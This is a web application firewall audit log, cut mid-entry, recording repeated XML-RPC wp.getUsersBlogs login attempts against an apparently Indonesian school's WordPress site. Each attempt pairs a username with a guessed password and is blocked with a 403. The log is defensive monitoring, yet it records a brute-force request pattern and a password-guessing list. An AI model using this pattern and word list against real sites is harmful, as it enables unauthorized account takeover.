smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d1c5a025-C-- wp.getUsersBlogs admin killer --d1c5a025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1c5a025-E-- --d1c5a025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069147342634 4580 (- - -) Stopwatch2: 1745069147342634 4580; combined=3486, p1=366, p2=2917, p3=0, p4=0, p5=115, sr=78, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1c5a025-Z-- --d6336e12-A-- [19/Apr/2025:20:26:53 +0700] aAOknXNa4dA2HllpK_N2sQAAAJY 103.236.140.4 36816 103.236.140.4 8181 --d6336e12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6336e12-C-- wp.getUsersBlogs admin tinkerbell --d6336e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6336e12-E-- --d6336e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069213441461 5152 (- - -) Stopwatch2: 1745069213441461 5152; combined=4117, p1=461, p2=3408, p3=0, p4=0, p5=140, sr=88, sw=108, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6336e12-Z-- --a86c573e-A-- [19/Apr/2025:20:27:53 +0700] aAOk2evDiFC_ir7MDwbg0QAAAEI 103.236.140.4 37090 103.236.140.4 8181 --a86c573e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a86c573e-C-- wp.getUsersBlogs admin Million2 --a86c573e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a86c573e-E-- --a86c573e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069273328828 5184 (- - -) Stopwatch2: 1745069273328828 5184; combined=3773, p1=452, p2=3125, p3=0, p4=0, p5=112, sr=89, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a86c573e-Z-- --acde1a0e-A-- [19/Apr/2025:20:28:58 +0700] aAOlGg6cTFSgLAHl7PrS_QAAAA4 103.236.140.4 37402 103.236.140.4 8181 --acde1a0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --acde1a0e-C-- wp.getUsersBlogs admin a801016 --acde1a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acde1a0e-E-- --acde1a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069338441847 5192 (- - -) Stopwatch2: 1745069338441847 5192; combined=3799, p1=494, p2=3127, p3=0, p4=0, p5=103, sr=86, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acde1a0e-Z-- --dca1d43e-A-- [19/Apr/2025:20:30:01 +0700] aAOlWXNa4dA2HllpK_N3EQAAAIA 103.236.140.4 37672 103.236.140.4 8181 --dca1d43e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dca1d43e-C-- wp.getUsersBlogs wakakur smkn22-jkt.sch --dca1d43e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dca1d43e-E-- --dca1d43e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069401317888 4981 (- - -) Stopwatch2: 1745069401317888 4981; combined=3705, p1=516, p2=3074, p3=0, p4=0, p5=69, sr=86, sw=46, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dca1d43e-Z-- --7ba6ba60-A-- [19/Apr/2025:20:31:05 +0700] aAOlmUruoUXZj665VUHxVwAAAMU 103.236.140.4 37974 103.236.140.4 8181 --7ba6ba60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ba6ba60-C-- wp.getUsersBlogs wakakur wakakur2019 --7ba6ba60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ba6ba60-E-- --7ba6ba60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069465114877 5608 (- - -) Stopwatch2: 1745069465114877 5608; combined=3989, p1=502, p2=3285, p3=0, p4=0, p5=115, sr=86, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ba6ba60-Z-- --33ef8d63-A-- [19/Apr/2025:20:32:07 +0700] aAOl10ruoUXZj665VUHxcgAAAMY 103.236.140.4 38260 103.236.140.4 8181 --33ef8d63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --33ef8d63-C-- wp.getUsersBlogs wakakur 1qazxsw2 --33ef8d63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33ef8d63-E-- --33ef8d63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069527393891 5583 (- - -) Stopwatch2: 1745069527393891 5583; combined=4002, p1=493, p2=3323, p3=0, p4=0, p5=108, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33ef8d63-Z-- --975ebd20-A-- [19/Apr/2025:20:33:08 +0700] aAOmFHNa4dA2HllpK_N3QwAAAIs 103.236.140.4 38540 103.236.140.4 8181 --975ebd20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --975ebd20-C-- wp.getUsersBlogs wakakur Beast3x@8*#4@! --975ebd20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --975ebd20-E-- --975ebd20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069588138396 17428 (- - -) Stopwatch2: 1745069588138396 17428; combined=27491, p1=472, p2=3427, p3=0, p4=0, p5=11811, sr=85, sw=93, l=0, gc=11688 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --975ebd20-Z-- --ee48ad11-A-- [19/Apr/2025:20:34:11 +0700] aAOmU0ruoUXZj665VUHxoAAAAMQ 103.236.140.4 38838 103.236.140.4 8181 --ee48ad11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ee48ad11-C-- wp.getUsersBlogs wakakur wakakur1989 --ee48ad11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee48ad11-E-- --ee48ad11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069651374523 5344 (- - -) Stopwatch2: 1745069651374523 5344; combined=4004, p1=466, p2=3323, p3=0, p4=0, p5=123, sr=88, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee48ad11-Z-- --70c23d07-A-- [19/Apr/2025:20:35:16 +0700] aAOmlEruoUXZj665VUHxrgAAAM0 103.236.140.4 39122 103.236.140.4 8181 --70c23d07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --70c23d07-C-- wp.getUsersBlogs wakakur qwertyuiop --70c23d07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c23d07-E-- --70c23d07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069716557656 5256 (- - -) Stopwatch2: 1745069716557656 5256; combined=4152, p1=472, p2=3451, p3=0, p4=0, p5=137, sr=87, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c23d07-Z-- --a42c9628-A-- [19/Apr/2025:20:36:16 +0700] aAOm0HNa4dA2HllpK_N3kgAAAIw 103.236.140.4 39406 103.236.140.4 8181 --a42c9628-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a42c9628-C-- wp.getUsersBlogs wakakur 789456 --a42c9628-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a42c9628-E-- --a42c9628-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069776205054 4616 (- - -) Stopwatch2: 1745069776205054 4616; combined=3441, p1=393, p2=2878, p3=0, p4=0, p5=99, sr=95, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a42c9628-Z-- --f1bfa413-A-- [19/Apr/2025:20:37:16 +0700] aAOnDEruoUXZj665VUHx8gAAAMs 103.236.140.4 39712 103.236.140.4 8181 --f1bfa413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f1bfa413-C-- wp.getUsersBlogs wakakur booboo --f1bfa413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1bfa413-E-- --f1bfa413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069836770034 5640 (- - -) Stopwatch2: 1745069836770034 5640; combined=3969, p1=446, p2=3139, p3=0, p4=0, p5=206, sr=88, sw=178, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1bfa413-Z-- --4900d161-A-- [19/Apr/2025:20:38:18 +0700] aAOnSg6cTFSgLAHl7PrTqQAAABQ 103.236.140.4 40000 103.236.140.4 8181 --4900d161-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4900d161-C-- wp.getUsersBlogs wakakur marina --4900d161-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4900d161-E-- --4900d161-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069898677592 5364 (- - -) Stopwatch2: 1745069898677592 5364; combined=3812, p1=490, p2=3145, p3=0, p4=0, p5=104, sr=86, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4900d161-Z-- --1ddc0e30-A-- [19/Apr/2025:20:39:24 +0700] aAOnjA6cTFSgLAHl7PrT2QAAABY 103.236.140.4 40318 103.236.140.4 8181 --1ddc0e30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1ddc0e30-C-- wp.getUsersBlogs wakakur Marketing2021 --1ddc0e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ddc0e30-E-- --1ddc0e30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069964079031 5141 (- - -) Stopwatch2: 1745069964079031 5141; combined=4082, p1=492, p2=3403, p3=0, p4=0, p5=109, sr=90, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ddc0e30-Z-- --f4b86d54-A-- [19/Apr/2025:20:40:24 +0700] aAOnyA6cTFSgLAHl7PrT7AAAAAU 103.236.140.4 40590 103.236.140.4 8181 --f4b86d54-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4b86d54-C-- wp.getUsersBlogs wakakur marketing2015_ --f4b86d54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4b86d54-E-- --f4b86d54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070024338664 5974 (- - -) Stopwatch2: 1745070024338664 5974; combined=4266, p1=527, p2=3432, p3=0, p4=0, p5=169, sr=98, sw=138, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4b86d54-Z-- --f8eab94a-A-- [19/Apr/2025:20:41:26 +0700] aAOoBnNa4dA2HllpK_N4KAAAAJg 103.236.140.4 40880 103.236.140.4 8181 --f8eab94a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f8eab94a-C-- wp.getUsersBlogs wakakur blessed1 --f8eab94a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8eab94a-E-- --f8eab94a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
